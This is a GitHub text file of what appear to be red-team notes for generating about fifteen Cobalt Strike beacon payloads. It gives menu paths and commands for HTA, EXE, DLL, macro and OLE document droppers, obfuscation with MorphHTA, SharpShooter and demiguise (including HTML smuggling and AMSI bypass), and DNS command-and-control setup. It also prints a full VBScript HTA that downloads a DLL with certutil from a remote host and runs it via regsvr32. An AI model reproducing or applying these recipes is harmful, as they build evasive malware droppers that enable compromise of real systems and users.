Misc_stuff/create_pl.txt at master · kluo84/Misc_stuff · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
Here are the 15 or so payloads that need to be generated for RPTs. The only method that’s not noted is that of the OLE document (#10, #11). If you have a working method, or any other payload types, please add them to the list.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------------------------------------------------

04-https-psh.hta
Cobalt Strike beacon payload, generated by:
Attacks -> Packages -> HTML Application -> Listener: https Method: Powershell -> Generate

05-https-psh-morph.hta
Cobalt Strike evil.hta generated in #1, combined with MorphHTA:

In the MorphHTA directory, run the following: python morph-hta.py --in evil.hta --maxstrlen 10 --maxvarlen 10 --out 05-https-psh-morph.hta --mode mshta
<Ensure overall file size is over 240,000>

06-https-sharp.html
- Cobalt Strike raw beacon payload, generate by:
- Attacks -> Payload Generator -> Listener: https Output: raw (check x64 payload box) -> Generate
- Move payload.bin into Sharpshooter directory, then run:
python SharpShooter.py --stageless --dotnetver 2 --payload hta --rawscfile payload.bin --output 06-https-sharp --smuggle
- Host the hta on cobaltstrike (not html) but output link will name .html

07-https-sharp-asmi.html
- Cobalt Strike raw beacon payload, generate by:
- Attacks -> Payload Generator -> Listener: https Output: raw (check x64 payload box) -> Generate
- Move payload.bin into Sharpshooter directory, then run:
./SharpShooter.py --stageless --dotnetver 2 --payload hta --rawscfile payload.bin --output 07-https-sharp-asmi --smuggle --template mcafee --amsi amsienable

08-https-exe.hta
Cobalt Strike beacon executable HTA payload, generated by:
Attacks -> Packages -> HTML Application -> Listener: https, Method: Executable -> Generate

09-https-vba.hta
Cobalt Strike beacon Visual Basic HTA payload, generated by:
Attacks -> Packages -> HTML Application -> Listener: https, Method: VBA -> Generate

10-https-cactus.hta
- In Cobalt Strike, go to: Cobalt Strike -> Script Manager -> Load (at the bottom of the new windows that opens) -> Navigate to where the CACTUSTORCH.cna file is, hit Open.
- To generate the payload: Attacks -> Host CACTUSTORCH Payload -> URI Path: 10-http-cactus.hta, Local Host:  <dns FQDN>, Local Port: 80 (does not load on 443!), Listener: https, (check Use Stageless Payload), Binary: rundll32.exe, Type: HTA -> Launch

11-https-tiki.hta
Windows executable > raw bin file > beacon.bin - (don't check 64bit payload)
Cat beacon.bin| base64 -w 0 | xclip -selection clipboard //need to install xclip

12-https.exe
Cobalt Strike beacon executable, generated by:
Attacks -> Packages -> Windows Executable -> Listener: https, Output: Windows EXE, (check Use x64 payload) -> Generate
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------
8 - https-macro.docm
Cobalt Strike Macro beacon payload, generated by:

Attacks -> Packages -> MS Office Macro -> Listener https -> Generate
Follows steps provided to enter CS Macro into a word document

9 - https-macro-pw.docm
After completing the document done in the steps above, select:
File -> Protect Document -> Encrypt with Password

10 - https-ole.docx
Create new word doc, insert Object > Select Package (bottom) > check Display as Icon > > Change Icon > Browse to icon we need > Change Caption if needed >
-> embed the payload to the object (either hta or exe)
11 - https-ole-pw.docx

13 - demi-https-OLA.html
Cobalt Strike Powershell command must first be generated (powershell -encodedcommand): Attacks -> Packages -> Payload Generator -> Listener: https, Output: Powershell Command (check use x64 payload) -> This creates a payload.txt file

Python demiguise.py -k <any plaintext key> -c "paste in Powershell command created in payload.txt file above" -p Outlook.Application -o 13-https-demi.hta

14 - https-certutil-exe-disk.hta
Create a Cobalt Strike .dll payload, generated by:
Attacks -> Packages -> Windows Executable -> Listener: https, Output: Windows DLL (64-bit) (check Use x64 payload) -> Generate (Make sure the name of the file, matches that in the script below!) Name example here: 16-https-stageless.dll

Create a file called 14-https-certutil-exe-disk.hta
Paste the following into it:
<script LANGUAGE="VBScript">
Set cmd = CreateObject("WScript.Shell")
visible = true

' cmd.exe /c "cd c:\Windows\Temp && certutil.exe -urlcache -split -f https://<URL where stageless .dll file is hosted> 16.dll && regsvr32 /u 16.dll
'Generates artifact on disk: c:\Windows\Temp\16.dll

cmd.run "cmd.exe /c ""cd c:\Windows\Temp && certutil.exe -urlcache -split -f https://<URL where stageless .dll file is hosted> 16.dll && regsvr32 /u 16.dll""", visible
window.close()
</script>

7 - https-psh-swd.txt
Cobalt Strike Powershell Scripted Web Delivery command, generated by:

Attacks -> Scripted Web Delivery -> URI Path: 07-https-psh-swd, Local Host: <dns FQDN>, Local Port: 443, Listener: https, Type: Powershell, (check Enable SSL box) -> Launch
(Copy and paste this script where needed)

----------------------------------------
Set up the DNS in Cobalt Strike
- From namecheap, add new record > A record > host(dns) , value(ip)
- Add new record > NS Record > host (ns1) , value (dns.FQDN.)
- ON Cobalt Strike, create listener > name (DNS) Payload (Beacon DNS)>> DNS_Hosts (ns1.FQDN) DNS_Host(Stager)(ns1.FQDN) DNSport(Bind) 53